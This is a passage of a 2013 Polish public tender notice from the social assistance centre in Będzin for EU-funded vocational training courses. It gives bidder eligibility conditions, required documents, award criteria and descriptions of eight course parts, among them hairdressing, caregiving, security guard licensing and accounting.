/*  okres ostatnich trzech lat nie dotyczy lat kalendarzowych, przy obliczaniu tego terminu należy stosować art. 112 ustawy z dnia 23 kwietnia 1964 roku Kodeks cywilny, zgodnie z którym termin oznaczony w latach kończy się z upływem dnia, który nazwą lub datą odpowiada początkowemu dniowi terminu.

/** należy wypełnić wszystkie pozycje formularza - Wykaz wykonanych, 
a w przypadku świadczeń okresowych lub ciągłych - również wykonywanych głównych usług w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie stanowiącego załącznik nr 7 do SIWZ, podając w każdej wypełnionej pozycji formularza:
- nazwę - przedmiot usługi odpowiadający opisowi przedmiotu niniejszego zamówienia w zakresie niezbędnym do wykazania spełniania warunku wiedzy 
i doświadczenia, to jest co najmniej 3 główne usługi obejmujące swoim rodzajem przedmiot zamówienia z zakresu, na który Wykonawca składa ofertę,
-   liczbę uczestników objętych usługą,
  -  wartość usługi w złotych brutto,
   - datę wykonania każdej usługi, a  w przypadku świadczeń okresowych 
 lub ciągłych - datę wykonywania każdej usługi  (od - dzień, miesiąc, rok 
do - dzień, miesiąc rok),
 - odbiorcę usługi - podmiot, na rzecz którego usługa została wykonana 
lub jest wykonywana (nazwę podmiotu zlecającego usługę, adres oraz telefon kontaktowy),
?- nazwę dowodu potwierdzającego, że usługa ta została wykonana 
należycie lub w przypadku świadczeń okresowych lub ciągłych 
jest wykonywana należycie - (należy nazwać ten dokument, np. referencja, rekomendacja, poświadczenie, przy czym dokument ten, z zastrzeżeniem ppkt b powyżej, powinien być wystawiony przez osobę trzecią - podmiot zlecający usługę oraz dotyczyć wyłącznie usług obejmujących swoim rodzajem przedmiot zamówienia z zakresu, na który Wykonawca składa ofertę, dokument należy załączyć do oferty oraz podać numer strony, którym dokument jest oznaczony w ofercie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnianie przez Wykonawcę warunku dysponowania odpowiednim potencjałem technicznym, jeśli Wykonawca ten oświadczy, że dysponuje odpowiednim do wykonania zamówienia potencjałem technicznym, składając oświadczenie wg wzoru stanowiącym załącznik nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnianie przez Wykonawcę warunku dysponowania osobami zdolnymi do wykonania zamówienia jeśli Wykonawca ten na czas realizacji zamówienia będzie dysponował co najmniej 2 osobami (dotyczy każdej części zamówienia) wyznaczonymi do realizacji zajęć teoretycznych i praktycznych, które posiadają wykształcenie, uprawnienia oraz odpowiednie kwalifikacje do prowadzenia zajęć w danym zakresie tematycznym. Wskazane osoby muszą posiadać co najmniej 3 letni staż pracy związany z przedmiotem zamówienia lub przeprowadzić w ciągu ostatnich 3 lat /* przed upływem terminu składania ofert co najmniej 3 szkolenia/kursy odpowiadające swoim rodzajem poszczególnym częściom zamówienia (adekwatne do części zamówienia, na którą Wykonawca składa ofertę), 
co wykaże w formularzu - Wykaz osób, które będą uczestniczyć w wykonaniu zamówienia stanowiącym załącznik nr 8 do SIWZ, wypełniając wszystkie jego pozycje, w tym również dotyczące informacji o podstawie do dysponowania osobami, które będą uczestniczyć w wykonaniu zamówienia.

/* okres ostatnich trzech lat nie dotyczy lat kalendarzowych, przy obliczaniu tego terminu należy stosować art. 112 ustawy z dnia 23 kwietnia 1964 roku Kodeks cywilny, zgodnie z którym termin oznaczony w latach kończy się z upływem dnia, który nazwą lub datą odpowiada początkowemu dniowi terminu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnianie przez Wykonawcę warunku znajdowania się 
w odpowiedniej sytuacji ekonomicznej i finansowej, jeżeli ten oświadczy, 
że znajduje się w odpowiedniej sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, składając oświadczenie wg wzoru stanowiącym załącznik nr 3 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1)	opis sposobu organizacji opieki nad dziećmi do 7 roku życia zawierający informacje określone w Rozdziale II ust. 11 SIWZ, z zastrzeżeniem, że złożenie przedmiotowego dokumentu nie jest wymagane w przypadku szkoleń (części zamówienia) wymienionych w Rozdziale II ust. 1 pkt 8 i 11 SIWZ,
2)	wzory właściwych dla danego szkolenia (danej części zamówienia) zaświadczeń, certyfikatów, świadectw i innych dokumentów potwierdzających ukończenie szkolenia i uzyskanie uprawnień w zawodzie objętym szkoleniem, o których mowa w Rozdziale II ust. 8 pkt 3 SIWZ,
3)	wypełniony dla każdej części zamówienia program szkolenia w oparciu o wzór stanowiący załącznik nr 9 do SIWZ.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) wypełniony formularz oferty (wzór formularza stanowi załącznik nr 2 do SIWZ),
2) oświadczenie Wykonawcy o posiadaniu aktualnego wpisu do rejestru instytucji szkoleniowych prowadzonego przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę instytucji szkoleniowej (wzór informacji stanowi załącznik nr 6 do SIWZ),
3) pełnomocnictwo do reprezentowania Wykonawcy, o którym mowa w Rozdziale IX ust. 5 SIWZ, o ile ofertę składa pełnomocnik.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Posiadanie przez Wykonawcę akredytacji kuratora oświaty w zakresie przedmiotu zamówienia, na który Wykonawca składa ofertę - 20</li>
<li>3 - Posiadanie przez Wykonawcę certyfikatu systemu zarządzania jakością kształcenia / szkolenia, wydanego na podstawie międzynarodowych norm ISO - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany istotnych postanowień zawartej umowy, w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, zgodnie z warunkami podanymi we wzorze umowy, stanowiącym załącznik nr 10 do SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bedzin.bip.info.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W siedzibie Zamawiającego - Miejskim Ośrodku Pomocy Społecznej w Będzinie
przy ul. 11-go Listopada 1, 42-500 Będzin, w pokoju nr 47.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.08.2013 godzina 10:00, miejsce: Miejski Ośrodek Pomocy Społecznej w Będzinie, kod pocztowy: 42-500, przy ul. 11-go Listopada 1, w sekretariacie - pokój numer 40.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt systemowy Rozwój i upowszechnienie form aktywnej integracji w MOPS Będzin jest współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Priorytetu VII Promocja integracji społecznej, 
Działanie 7.1 Rozwój i upowszechnienie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej Programu Operacyjnego Kapitał Ludzki.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Szkolenie w zakresie fryzjer damsko - męski.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szkoleniem będzie objętych 5 osób, przy czym Zamawiający zastrzega sobie prawo do: zmniejszenia liczby osób planowanych do objęcia szkoleniem o nie więcej 
niż 1 osobę w ramach każdej edycji szkolenia w wyniku nieprzewidzianych zdarzeń losowych (np. choroba uczestnika projektu, sprawowanie opieki nad chorym członkiem rodziny, utrata statusu uczestnika projektu, niezgłoszenie się uczestnika na szkolenie, rezygnacja uczestnika ze szkolenia, itp.) oraz zwiększenia liczby osób planowanych do objęcia szkoleniem w ramach każdej edycji szkolenia o nie więcej niż 1 osobę.
Usługa szkoleniowa przeprowadzona zostanie w jednej grupie liczącej 5 osób.
Szkolenie musi obejmować 200 godzin zajęć szkoleniowych przypadających 
na jednego uczestnika, w tym 30 godzin zajęć teoretycznych, 170 godzin zajęć praktycznych. Część praktyczna szkolenia będzie obejmować ćwiczenia praktyczne na żywym modelu i na manekinie w celu racjonalnego wykorzystania czasu przeznaczonego na zajęcia praktyczne, również w sytuacji gdy w salonie nie ma klientów. Wykonawca zobowiązany jest zorganizować zajęcia praktyczne we własnych lub wynajętych warsztatach wyposażonych w narzędzia, przybory, materiały kosmetyczne i urządzenia techniczne dostosowane do specyfiki przedmiotu zamówienia, z zastrzeżeniem, że co najmniej 120 godzin zegarowych zajęć praktycznych każdy uczestnik szkolenia ma odbyć na terenie zakładu pracy - salonu fryzjerskiego, zgodnie z informacją podaną w programie szkolenia.
Podczas zajęć praktycznych przy jednym stanowisku powinna pracować jedna osoba. Każdy uczestnik otrzyma na własność zestaw fryzjerski, w skład którego wchodzi co najmniej: fartuch ochronny, grzebień i nożyczki.
Szczegółowy opis przedmiotu zamówienia określa załącznik nr 1 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 11.10.2013.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Szkolenie w zakresie kurs kosmetyczny z elementami wizażu i stylizacją paznokci.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szkoleniem będzie objętych 7 osób, przy czym Zamawiający zastrzega sobie prawo do: zmniejszenia liczby osób planowanych do objęcia szkoleniem o nie więcej 
niż 1 osobę w ramach każdej edycji szkolenia w wyniku nieprzewidzianych zdarzeń losowych (np. choroba uczestnika projektu, sprawowanie opieki nad chorym członkiem rodziny, utrata statusu uczestnika projektu, niezgłoszenie się uczestnika na szkolenie, rezygnacja uczestnika ze szkolenia, itp.) oraz zwiększenia liczby osób planowanych do objęcia szkoleniem w ramach każdej edycji szkolenia o nie więcej niż 1 osobę.
Usługa szkoleniowa przeprowadzona zostanie w jednej grupie liczącej 7 osób.
Szkolenie musi obejmować 200 godzin zajęć szkoleniowych przypadających 
na jednego uczestnika, w tym 30 godzin zajęć teoretycznych, 170 godzin zajęć praktycznych. Wykonawca zobowiązany jest zorganizować zajęcia praktyczne we własnych 
lub wynajętych warsztatach wyposażonych w narzędzia, urządzenia techniczne 
i produkty dostosowane do specyfiki przedmiotu zamówienia obejmujące przede wszystkim akcesoria do makijażu, demakijażu i pielęgnacji twarzy, fotele 
do pedicure, stoliki do manicure, frezarki do paznokci, lampy UV, 
z zastrzeżeniem, że co najmniej 80 godzin zegarowych zajęć praktycznych każdy uczestnik szkolenia ma odbyć na terenie zakładu pracy - salonu kosmetycznego i/lub salonu wizażu i stylizacji, zgodnie z informacją wskazaną w programie szkolenia. Podczas zajęć praktycznych przy jednym stanowisku powinna pracować jedna osoba.
Każdy uczestnik otrzyma na okres szkolenia materiały niezbędne do zajęć praktycznych, w tym akcesoria do makijażu, demakijażu i pielęgnacji twarzy, a także tipsy, żele, zdobniki, kleje, cążki, pilniczki.
Szczegółowy opis przedmiotu zamówienia określa załącznik nr 1 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.11.2013.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Szkolenie w zakresie opiekun osób starszych, osób niepełnosprawnych i dzieci.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szkoleniem będzie objętych 8 osób, przy czym Zamawiający zastrzega sobie prawo do: zmniejszenia liczby osób planowanych do objęcia szkoleniem o nie więcej 
niż 1 osobę w ramach każdej edycji szkolenia w wyniku nieprzewidzianych zdarzeń losowych (np. choroba uczestnika projektu, sprawowanie opieki nad chorym członkiem rodziny, utrata statusu uczestnika projektu, niezgłoszenie się uczestnika na szkolenie, rezygnacja uczestnika ze szkolenia, itp.) oraz zwiększenia liczby osób planowanych do objęcia szkoleniem w ramach każdej edycji szkolenia o nie więcej niż 1 osobę.
Usługa szkoleniowa przeprowadzona zostanie w dwóch grupach liczących po 4 osoby każda grupa. Każda edycja szkolenia musi obejmować 160 godzin zajęć szkoleniowych przypadających na jednego uczestnika, w tym 50 godzin zajęć teoretycznych, 110 godzin zajęć praktycznych. Część praktyczna w ramach każdej edycji szkolenia musi obejmować zajęcia praktyczne w Domu Pomocy Społecznej, Hospicjum lub podobnych placówkach w wymiarze co najmniej 80 godzin zegarowych, zgodnie z informacją wskazaną w programie szkolenia. Podczas zajęć praktycznych przy jednym stanowisku powinna pracować jedna osoba.
Szczegółowy opis przedmiotu zamówienia określa załącznik nr 1 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.11.2013.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Szkolenie w zakresie kucharz małej gastronomii 
z organizacją przyjęć okolicznościowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szkoleniem będzie objętych 10 osób, przy czym Zamawiający zastrzega sobie prawo do: zmniejszenia liczby osób planowanych do objęcia szkoleniem o nie więcej 
niż 1 osobę w ramach każdej edycji szkolenia w wyniku nieprzewidzianych zdarzeń losowych (np. choroba uczestnika projektu, sprawowanie opieki nad chorym członkiem rodziny, utrata statusu uczestnika projektu, niezgłoszenie się uczestnika na szkolenie, rezygnacja uczestnika ze szkolenia, itp.) oraz zwiększenia liczby osób planowanych do objęcia szkoleniem w ramach każdej edycji szkolenia o nie więcej niż 1 osobę. Usługa szkoleniowa przeprowadzona zostanie w dwóch grupach liczących po 5 osób każda grupa. Każda edycja szkolenia musi obejmować 200 godzin zajęć szkoleniowych przypadających na jednego uczestnika, w tym 40 godzin zajęć teoretycznych, 160 godzin zajęć praktycznych. Część praktyczna w ramach każdej edycji szkolenia musi obejmować zajęcia praktyczne w wymiarze 160 godzin zegarowych w kuchni wyposażonej 
w odpowiednie urządzenia do przygotowywania potraw, z których praktyka 
w zakładzie pracy musi wynosić co najmniej 40 godzin na uczestnika, przy czym pod pojęciem zakładu pracy Zamawiający rozumie zakłady gastronomiczne, 
w tym restauracje, bary z wyłączeniem barów szybkiej obsługi, bistra, jadłodajnie, kawiarnie. Podczas zajęć praktycznych przy jednym stanowisku powinna pracować jedna osoba.
Szczegółowy opis przedmiotu zamówienia określa załącznik nr 1 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.11.2013.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Szkolenie w zakresie nowoczesny sprzedawca z obsługą kasy fiskalnej oraz komputerowych programów handlowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szkoleniem będzie objętych 19 osób, przy czym Zamawiający zastrzega sobie prawo do: zmniejszenia liczby osób planowanych do objęcia szkoleniem o nie więcej 
niż 1 osobę w ramach każdej edycji szkolenia w wyniku nieprzewidzianych zdarzeń losowych (np. choroba uczestnika projektu, sprawowanie opieki nad chorym członkiem rodziny, utrata statusu uczestnika projektu, niezgłoszenie się uczestnika na szkolenie, rezygnacja uczestnika ze szkolenia, itp.) oraz zwiększenia liczby osób planowanych do objęcia szkoleniem w ramach każdej edycji szkolenia o nie więcej niż 1 osobę. Usługa szkoleniowa przeprowadzona zostanie w dwóch grupach, z których pierwsza grupa liczyć będzie 12 osób, a druga grupa 7 osób. Każda edycja szkolenia musi obejmować 200 godzin zajęć szkoleniowych przypadających na jednego uczestnika, w tym 40 godzin zajęć teoretycznych, 160 godzin zajęć praktycznych. Część praktyczna w ramach każdej edycji szkolenia musi obejmować: zajęcia praktyczne z wykorzystaniem kas fiskalnych w łącznym wymiarze 30 godzin zegarowych, z których po 10 godzin zegarowych przypadać będzie 
na obsługę poszczególnych, trzech różnych modeli kasy fiskalnej; zajęcia z zakresu wykorzystania programów komputerowych, w tym komputerowych programów handlowych w małych i średnich przedsiębiorstwach w łącznym wymiarze 120 godzin zegarowych oraz ćwiczenia z pozostałych zagadnień objętych programem szkolenia, 
w tym z zakresu wystawiania rachunków i faktur.
Podczas zajęć praktycznych z zakresu obsługi komputera przy jednym stanowisku komputerowym wyposażonym w komputer wraz z pełnym oprogramowaniem musi pracować jedna osoba.
Podczas zajęć praktycznych z zakresu obsługi kas fiskalnych przy jednym stanowisku kasowym wyposażonym w kasę fiskalną musi pracować jedna osoba.
Szczegółowy opis przedmiotu zamówienia określa załącznik nr 1 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.11.2013.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Szkolenie w zakresie kurs dla osób ubiegających się 
o licencję pracownika ochrony fizycznej osób i mienia pierwszego stopnia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szkoleniem będzie objętych 15 osób. Zamawiający zastrzega sobie prawo do:
zmniejszenia liczby osób planowanych do objęcia szkoleniem o nie więcej 
niż 1 osobę w ramach każdej edycji szkolenia w wyniku nieprzewidzianych zdarzeń losowych (np. choroba uczestnika projektu, sprawowanie opieki nad chorym członkiem rodziny, utrata statusu uczestnika projektu, niezgłoszenie się uczestnika na szkolenie, rezygnacja uczestnika ze szkolenia, itp.) oraz zwiększenia liczby osób planowanych do objęcia szkoleniem w ramach każdej edycji szkolenia o nie więcej niż 1 osobę. Usługa szkoleniowa przeprowadzona zostanie w dwóch grupach, z których pierwsza grupa liczyć będzie 6 osób, a druga grupa 9 osób. 
Każda edycja szkolenia musi obejmować nie mniej niż 270 godzin zajęć szkoleniowych przypadających na jednego uczestnika, z których: 245 godzin musi obejmować zagadnienia określone w załącznikach nr 1 i 2 do rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 7 sierpnia 1998 roku w sprawie rodzajów dyplomów i świadectw wydawanych przez szkoły i inne placówki oświatowe, które potwierdzają uzyskanie specjalistycznych kwalifikacji w zakresie ochrony osób 
i mienia, minimalnego zakresu programów kursów pracowników ochrony fizycznej pierwszego i drugiego stopnia oraz zakresu obowiązujących tematów egzaminów i trybu ich składania, składu komisji egzaminacyjnej i sposobu przeprowadzania egzaminu (Dz. U. Nr 113, poz. 731 z późn. zm.), natomiast 25 godzin musi obejmować zagadnienia z zakresu zabezpieczania imprez masowych. Praktyczne szkolenie strzeleckie musi być prowadzone zgodnie z instrukcją szkolenia strzeleckiego pracowników ochrony, która stanowi załącznik nr 2 do wyżej wymienionego rozporządzenia.
Szczegółowy opis przedmiotu zamówienia określa załącznik nr 1 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.11.2013.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Szkolenie w zakresie magazynier z obsługą wózków jezdniowych z napędem silnikowym.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szkoleniem będzie objętych 17 osób. Zamawiający zastrzega sobie prawo do:
zmniejszenia liczby osób planowanych do objęcia szkoleniem o nie więcej 
niż 1 osobę w ramach każdej edycji szkolenia w wyniku nieprzewidzianych zdarzeń losowych (np. choroba uczestnika projektu, sprawowanie opieki nad chorym członkiem rodziny, utrata statusu uczestnika projektu, niezgłoszenie się uczestnika na szkolenie, rezygnacja uczestnika ze szkolenia, itp.) oraz zwiększenia liczby osób planowanych do objęcia szkoleniem w ramach każdej edycji szkolenia o nie więcej niż 1 osobę. Usługa szkoleniowa przeprowadzona zostanie w dwóch grupach, z których pierwsza grupa liczyć będzie 8 osób, a druga grupa 9 osób. Każda edycja szkolenia musi obejmować 200 godzin zajęć szkoleniowych przypadających na jednego uczestnika z których 67 dotyczyć ma zagadnień z zakresu obsługi wózków jezdniowych z napędem silnikowym, w tym: 80 godzin zajęć teoretycznych i 120 godzin zajęć praktycznych (z których 15 dotyczyć ma zagadnień 
z zakresu obsługi wózków jezdniowych z napędem silnikowym).
W ramach 67 godzin zagadnień z zakresu obsługi wózków jezdniowych 
z napędem silnikowym - 8 godzin zegarowych dotyczyć musi modułu bezpiecznej wymiany butli gazowych. Część praktyczna w ramach każdej edycji szkolenia musi obejmować: zajęcia praktyczne z wykorzystaniem kas fiskalnych w łącznym wymiarze 30 godzin zegarowych, z których po 10 godzin zegarowych przypadać będzie 
na obsługę poszczególnych, trzech różnych modeli kasy fiskalnej; zajęcia z zakresu wykorzystania programów komputerowych, w tym komputerowych programów handlowych w małych i średnich przedsiębiorstwach w łącznym wymiarze 65 godzin zegarowych; praktyczną naukę jazdy wózkiem i manewrowania osprzętem w wymiarze 15 godzin zegarowych oraz ćwiczenia z pozostałych zagadnień objętych programem szkolenia, w tym z zakresu sporządzania faktur.
Podczas zajęć praktycznych z zakresu obsługi komputera przy jednym stanowisku komputerowym wyposażonym w komputer wraz z pełnym oprogramowaniem musi pracować jedna osoba.
Podczas zajęć praktycznych z zakresu obsługi kas fiskalnych przy jednym stanowisku kasowym wyposażonym w kasę fiskalną musi pracować jedna osoba.
Szczegółowy opis przedmiotu zamówienia określa załącznik nr 1 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.11.2013.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Szkolenie w zakresie księgowość w małej i średniej firmie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szkoleniem będą objęte 4 osoby, przy czym Zamawiający zastrzega sobie prawo do:
zmniejszenia liczby osób planowanych do objęcia szkoleniem o nie więcej 
niż 1 osobę w ramach każdej edycji szkolenia w wyniku nieprzewidzianych zdarzeń losowych (np. choroba uczestnika projektu, sprawowanie opieki nad chorym członkiem rodziny, utrata statusu uczestnika projektu, niezgłoszenie się uczestnika na szkolenie, rezygnacja uczestnika ze szkolenia, itp.) oraz zwiększenia liczby osób planowanych do objęcia szkoleniem w ramach każdej edycji szkolenia o nie więcej niż 1 osobę. Usługa szkoleniowa przeprowadzona zostanie w jednej grupie liczącej 4 osoby. Szkolenie musi obejmować 200 godzin zajęć szkoleniowych przypadających 
na jednego uczestnika, w tym 80 godzin zajęć teoretycznych, 120 godzin zajęć praktycznych. Część praktyczna szkolenia będzie obejmować: zajęcia z wykorzystaniem komputera w firmie - obsługę edytora tekstu Word, arkusza kalkulacyjnego Excel oraz Internetu w łącznym wymiarze 20 godzin zegarowych;
zajęcia z obsługi komputera z wykorzystaniem programów wspomagających finanse i księgowość oraz kadry i płace - SYMFONIA, współpraca przedsiębiorstwa z ZUS za pośrednictwem programu PŁATNIK, dokumentacja zasad prowadzenia rachunkowości przy użyciu komputera w łącznym wymiarze 80 godzin zegarowych oraz ćwiczenia z zakresu pozostałych zagadnień wymienionych w programie szkolenia, w tym gry symulacyjne w łącznym wymiarze 20 godzin zegarowych.
Podczas zajęć praktycznych z zakresu obsługi komputera przy jednym stanowisku komputerowym wyposażonym w komputer wraz z pełnym oprogramowaniem musi pracować jedna osoba.
Szczegółowy opis przedmiotu zamówienia określa załącznik nr do SIWZ.</p></li>
